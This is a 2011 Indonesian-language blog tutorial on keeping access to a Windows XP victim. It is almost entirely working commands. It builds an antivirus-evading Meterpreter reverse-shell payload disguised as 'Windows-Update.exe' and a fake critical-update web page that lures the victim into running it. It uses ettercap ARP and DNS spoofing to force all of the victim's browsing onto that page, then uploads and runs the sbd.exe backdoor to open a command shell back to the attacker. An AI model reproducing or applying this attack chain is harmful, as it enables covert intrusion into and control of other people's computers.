Searching...
October 25, 2011
Tuesday, October 25, 2011

[Maintain Access] Metasploit, Ettercap-ng, and Wine VS Windows XP

Setelah banyak mempelajari tentang gaining access dengan metasploit melalui berbagai, cara. Sekarang saatnya maintain access dengan backdoor yang kemudian dieksekusi oleh wine.


Preparation:
1. Metasploit dapat diperoleh di sini
2. Ettercap-ng suite dapat diperoleh di sini
3. Wine dapat diperoleh di sini
4. Trojan Backdoor sbd.exe dapat ditemukan di backtrack, pada direktory: /pentest/windows-binary/tools/


Briefing:
1. Buat payload yang dienkoding dengan shikata_ga_nai untuk melewati antivirus.
2. Paksa korban mendownload payload kemudian mengeksekusinya.
3. Upload Trojan sbd.exe ke korban
4. Jalankan sbd.exe untuk masuk ke command prompt milik korban


Tutorial:





1. Buat payload yang dienkoding dengan shikata_ga_nai untuk melewati anti-virus


root@red-dragon:/# msfpayload /windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 -e shikata_ga_nai -i 4 X > /var/www/Windows-Update.exe

Keterangan:
 a. LHOST adalah IP address anda
 b. LPORT adalah PORT sesi meterpreter anda [default = 4444]
2. Edit file /var/www/index.html

root@red-dragon:/# gedit /var/www/index.html

Menjadi:

<html>
<head>
<title>Warning!!!</title>
</head>
<body>
<p align="center" class="style2"><u><b>Perhatian:</u></b>Windows anda berada pada keadaan yang sangat kritis. Download dan jalankan update diperlukan untuk menghubungkan anda kembali ke internet.</p>
<p align="center">
<input align="center" type="button" name="Button" value="Download persetujuan" onClick="window.open('/Windows-Update.exe','download'); return false;"></p>
</body>
</html>

Save file tersebut, kemudian jalankan service HTTPD Apache2. Backtrack > Service > HTTPD > start apache

3. Edit file /usr/share/ettercap/etter.dns

root@red-dragon:/# gedit /usr/share/ettercap/etter.dns

Menjadi:

* A 192.168.1.6

Keterangan: 192.168.1.6 adalah IP address anda
Save file tersebut, dan jalankan dns_spoof untuk mengalihkan setiap halaman yang korban tuju, menjadi index.html yang kita buat tadi.

root@red-dragon:/# ettercap -i wlan0 -T -q -P dns_spoof -M ARP /192.168.1.1/ /192.168.1.3/

Ini yang akan terjadi pada komputer korban =)

  
 

Apapun web address yang korban ketik, ia akan selalu kembali ke halaman ini. MEnunggu sampai korban frustasi, kita akan melakukan pengaturan Metasploit.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
msf exploit(handler) > set LHOST 192.168.1.6
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit-j
[*] Started reverse handler on 192.168.1.6:444 
[*] Starting the payload handler...


Ketika korban mendownload file Windows-Update.exe dan menjalankan file tersebut, kita akan memasuki meterpreter sesi pertama

[*] Sending stage (749056 bytes) to 192.168.56.50
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.3:1908) at Tue Oct 25 17:41:33 2011
 




4. Upload Trojan Backdoor ke korban

meterpreter > upload /pentest/windows-binaries/tools/sbd.exe C:/
[*] uploading : /pentest/windows-binaries/tools/sbd.exe -> C:/
[*] uploaded  : /pentest/windows-binaries/tools/sbd.exe -> D:/\sbd.exe

Kemudian, eksekusi Trojan Backdoor dengan melakukan sedikit konfigurasi

meterpreter > execute -H -f "C:/sbd.exe -q -r 10 -k reddragon -e cmd -p 1809 192.168.1.6"
Process 728 created.



Keterangan:
 a. reddragon dapat diganti menjadi apapun sesuka anda
 b. 1809 dapat diganti menjadi angka berapapun sesuka anda
 c. 192.168.1.6 adalah IP address anda

5. Jalankan sbd.exe dengan wine

root@red-dragon:/# wine /pentest/windows-binaries/tools/sbd.exe -l -k reddragon -p 1809

Keterangan:

 a. reddragon harus sesuai dengan nama yang anda input di tahap 4
 b. 1809 harus sesuai dengan angka yang anda input di tahap 4


Created by: red-dragon

Supported by:
Wine 

Loved By:

1 comment:

  1. tulisan di setiap postnya jgn ijo dong gan bikin pusing :-(

    ReplyDelete

 
Back to top!